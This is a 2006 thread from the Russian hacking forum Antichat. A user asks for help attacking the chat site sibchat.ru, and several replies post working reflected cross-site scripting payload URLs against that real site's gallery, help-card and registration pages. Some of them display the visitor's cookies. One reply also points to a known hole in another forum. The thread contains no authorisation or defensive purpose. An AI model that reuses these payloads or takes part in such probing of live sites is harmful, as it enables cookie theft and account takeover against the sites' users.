Форум АНТИЧАТ
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Ну помогите кто-нибудь.. (https://forum.antichat.xyz/showthread.php?t=24302)

Trentemoller 22.09.2006 08:31
Ну помогите кто-нибудь..
 
Посмотрите чат http://sibchat.ru может что-нибудь можно с ним сделать...
Спасибо второй раз.

alextoun 22.09.2006 13:49
была уже тема такая!! Дубляж

Kaban 22.09.2006 19:10
пассивная XSS:
http://www.sibchat.ru/gallery.php?sid='><script>alert(/Kaban/)</script>

.Slip 22.09.2006 20:07
Kaban, молодец. Ксс рабочая, проверял.
http://www.sibchat.ru/gallery.php?sid='><script>alert(document.cookie)</script>
Впринципе считаю вопрос исчерпаным. Тему пока что закрывать не буду, может сам ещё найду что нибудь, или другие выложут. Но за оффтоп буду ставить минусы.

Trentemoller 23.09.2006 03:42
А что можно через Xss сделать, и дайте пожалуйста ссылку, где можно подробно об Xss узнать....
Спасибо, что ответили...

KPOT_f!nd 23.09.2006 06:42
Вот это почитай

http://forum.antichat.ru/thread24312-xss.html
http://forum.antichat.ru/thread20140.html

KPOT_f!nd 23.09.2006 07:02
И еще
http://forum.antichat.ru/thread7083-%CD%E5%E1%EE%EB%FC%F8%EE%E9+faq+(XSS).html

http://forum.antichat.ru/thread14424-%CA%E0%EA+%E7%E0%F8%E8%F4%F0%EE%E2%E0%F2%FC+%F1%F1 %FB%EB%EA%F3.html

http://forum.antichat.ru/thread19997-%DD%ED%F6%E8%EA%EB%EE%EF%E5%E4%E8%FF+%F3%FF%E7%E2% E8%EC%FB%F5+%F1%EA%F0%E8%EF%F2%EE%E2.html

И еще по юзай гугл:
Цитата:
XSS - это
Вот так задай гуглу. И лн тебе найдет!

VampiRUS 23.09.2006 09:13
одни только xss
http://www.sibchat.ru/card_help.php?sid=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://www.sibchat.ru/register.php?sid=%3C/script%3E%3Cscript%3Ealert()%3C/script%3E

PSalm69 23.09.2006 10:26
Можно отсюда http://forum.chita.ru/
Если версия форума реально 2.06 то топаем сюда http://www.securitylab.ru/vulnerability/203209.php

.Slip 24.09.2006 01:16
И ещё..
Показывает comp_id, то есть можно предположить что для бана они используют comp_id.
http://www.sibchat.ru/card_help.php?sid="><script>alert(document.cookie) </script>
-------------
Здесь то же самое:
http://www.sibchat.ru/register.php?sid="><script>alert(document.cookie)</script>
Только ещё вылазиет такая бяка:
Цитата:
&s='+document.regform.sex.value,'iconsel','no','no ','no','no'); } function changeicon( icon ) { ic = document.getElementById('user_icon'); if (ic==null) return; ic.src = 'im2/'+icon; document.regform.icon.value=icon; } function open_window(w,h,url,win_id,resizable,toolbar,locn) { sw=screen.width; sh=screen.height; x=(sw-w)/2; y=(sh-h)/2; opts='scrollbars=yes,resizable='+resizable+',toolb ar='+toolbar+',location='+locn+',directories=no,me nubar=no,width='+w+',height='+h; opts+=(navigator.appName.indexOf("Microsoft")>=0?' ,left='+x+',top='+y:',screenX='+x+',screenY='+y); win = window.open(url,win_id,opts); win.focus(); return win; }
-------------
ЗЫ Все три ксс добавлю в f.a.q. по чатам


Время: 03:33
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице